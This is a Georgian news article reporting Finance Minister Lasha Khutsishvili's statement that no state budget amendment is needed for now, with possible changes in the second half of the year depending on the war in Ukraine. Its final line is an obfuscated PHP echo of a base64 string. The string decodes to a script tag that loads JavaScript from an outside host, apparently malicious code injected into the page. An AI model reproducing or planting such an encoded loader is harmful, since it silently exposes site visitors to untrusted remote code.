celsiusi
ავერსი საქკაბელი
ფინანსთა მინისტრმა, ლაშა ხუციშვილმა პრესკონფერენციაზე განაცხადა, რომ ამ ეტაპზე, სახელმწიფო ბიუჯეტის ცვლილების საჭიროება არ არსებობს.
 
ხუციშვილის თქმით, შესაბამისი ცვლილებების საჭიროება შესაძლოა, მიმდინარე წლის მეორე ნახევარში დადგეს.
 
„სხვადასხვა პროგნოზები არსებობს ამ მიმართულებით, მაგრამ ამ ეტაპზე მნიშვნელოვანია, დღეის მოცემულობით, რისი პროგნოზირებაც არის შესაძლებელი, სწორედ ამაზე დაყრდნობითაა აღნიშნული პროგნოზები გაკეთებული. ბუნებრივია, როდესაც ვსაუბრობთ ბიუჯეტზე, წლიურ დოკუმენტზე, მნიშვნელოვანია, რომ ცოტა გრძელვადიანი ხედვა გვქონდეს, არა კონკრეტულად ერთი ან ორი თვის განმალობაში, არამედ 6 თვის მიმდინარე, როგორ განვითარდება გეოპოლიტიკური მდგომარეობა ჩვენს რეგიონში. ბუნებრივია, გარკვეული ცვლილებების საჭიროება შესაძლებელია დადგეს, თუმცა, ამ ეტაპზე ამის თქმის შესაძლებლობა არ გვაქვს, იქიდან გამომდინარე, რომ გაურკვევლობა არის საკმაოდ მაღალი. ვფიქრობ, რომ ეს საკითხი შეიძლება დადგეს უკვე წლის მეორე ნახევარში, როდესაც მეტი სიცხადე გვექნება. აქედან გამომდინარე, შესაძლებლობა გვექნება ვიმსჯელოთ ბიუჯეტში წარმოდგენილი პარამეტრების ცვლილებაზე.
 
თქვენ იცით, რომ იანვრის და თებერვლის თვე საკმაოდ მაღალი ეკონომიკური ზრდით ხასიათდებოდა საქართველოში. 2 თვის ჯამში ეკონომიკური ზრდა იყო 16,3%, თუმცა, ბუნებრივია, მნიშვნელოვან გავლენას იქონიებს უკრაინაში არსებული საომარი მდგომარეობა, არა მხოლოდ უკრაინასა და რუსეთზე, არამედ რეგიონის ყველა ქვეყანაზე, მათ შორის მნიშვნელოვანი გავლენა ექნება მსოფლიო ეკონომიკაზე. აქედან გამომდინარე, მნიშვნელოვანია ჩვენ გვქონდეს უფრო მეტი ინფორმაცია და მეტი სიცხადე გეოპოლიტიკურ მდგომარეობასთან დაკავშირებით. სწორედ ამის შემდგომ, შესაძლებელია ვიმსჯელოთ იმ პარამეტრებზე, რითიც დაიგეგმა გასული წლის ბოლოს ბიუჯეტი, რამდენად მიღწევადია ან არ არის მიღწევადი. ამ ეტაპზე ბიუჯეტის ცვლილების საჭიროება არ არსებობს“, - განაცხადა ლაშა ხუციშვილმა.
 
997
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");